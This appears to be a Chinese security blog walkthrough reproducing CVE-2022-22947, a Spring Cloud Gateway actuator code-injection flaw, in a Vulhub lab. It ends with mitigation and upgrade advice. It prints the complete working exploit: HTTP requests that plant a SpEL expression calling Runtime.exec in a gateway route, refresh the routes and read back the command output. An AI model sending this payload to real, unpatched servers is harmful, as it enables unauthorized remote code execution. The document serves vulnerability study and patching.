CVE-2022-22947：Spring Cloud Gateway 远程代码执行漏洞复现及修复建议

爱吃橙子的羊

22280人浏览 · 2022-03-12 01:10:54

爱吃橙子的羊 · 2022-03-12 01:10:54 发布

关注WX：【小白SEC】查看更多内容……

CVE-2022-22947：Spring Cloud Gateway 远程代码执行漏洞复现及修复建议

本文仅为验证漏洞，在本地环境测试验证，无其它目的

CVE 编号：

CVE-2022-22947

漏洞说明：

2022年3月1日，VMware官方发布漏洞报告，在使用Spring Colud Gateway的应用程序开启、暴露Gateway Actuator端点时，会容易造成代码注入攻击，攻击者可以制造恶意请求，在远程主机进行任意远程执行。

漏洞影响范围：

Spring Cloud Gateway 3.1.x < 3.1.1
Spring Cloud Gateway 3.0.x < 3.0.7
旧的、不受支持的版本也会受到影响

漏洞级别：

高危

利用条件：

参考：长亭安全课堂

除了Spring Cloud Gateway 外，程序还用到了 Spring Boot Actuator 组件（它用于对外提供 /actuator/ 接口）；
Spring 配置对外暴露 gateway 接口，如 application.properties 配置为：
# 默认为true
management.endpoint.gateway.enabled=true

# 以逗号分隔的一系列值，默认为 health
# 若包含 gateway 即表示对外提供 Spring Cloud Gateway 接口
management.endpoints.web.exposure.include=gateway

漏洞复现：

本次复现采用Vulhub靶场环境，需要在本地搭建Vulhub靶场（自行百度，如有问题可以沟通交流，后期时间充足可以再出Vulhub搭建教程），需注意将请求中的代码更换为靶机所在IP
（参考：Vulhub/CVE-2022-22947）

进入靶场环境：【Vulhub}-【Spring】-【CVE-2022-22947】
启动服务：
```
docker-compose up -d
```
访问靶场服务器IP+端口：http://192.168.32.130:8080
此处要注意，因为靶场会占用8080端口，所以当BP和靶场在统一环境下时，注意修改BP的8080端口为其他，并在浏览器中进行更新才能访问靶场环境

构造包含恶意请求的路由，利用BP进行发送：（图中标出的执行参数，更换id为whoami等可进行验证）

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.32.130:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like 		Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329

{
  "id": "hacktest",
 "filters": [{
"name": "AddResponseHeader",
"args": {
  "name": "Result",
  "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
}
  }],
  "uri": "http://example.com"
}

请添加图片描述

然后应用刚添加的路由发送如下数据包，此数据包会触发表达式执行：

POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.32.130:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

请添加图片描述

发送如下数据包可查看结果：

GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.32.130:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

请添加图片描述

最后发送如下数据包进行清理，删除所添加的路由：

DELETE /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.32.130:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close

请添加图片描述

再次刷新路由：

POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.32.130:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

请添加图片描述

以上漏洞环境使用完成后，使用以下命令进行环境移除：
```
docker-compose down
```

如果不会搭建Vulhub本地靶场，可利用VulFOCUS在线靶场，进行注册后在线使用，有问题可以交流

漏洞修复：

参考：长亭安全课堂

临时解决方案

如果不需要Actuator端点，可以通过management.endpoint.gateway.enable：false配置将其禁用

如果需要Actuator端点，则应使用Spring Security对其进行保护。
官方升级补丁

3.1.x版本用户及时升级到3.1.1+

3.0.x版本用户及时升级到3.0.7+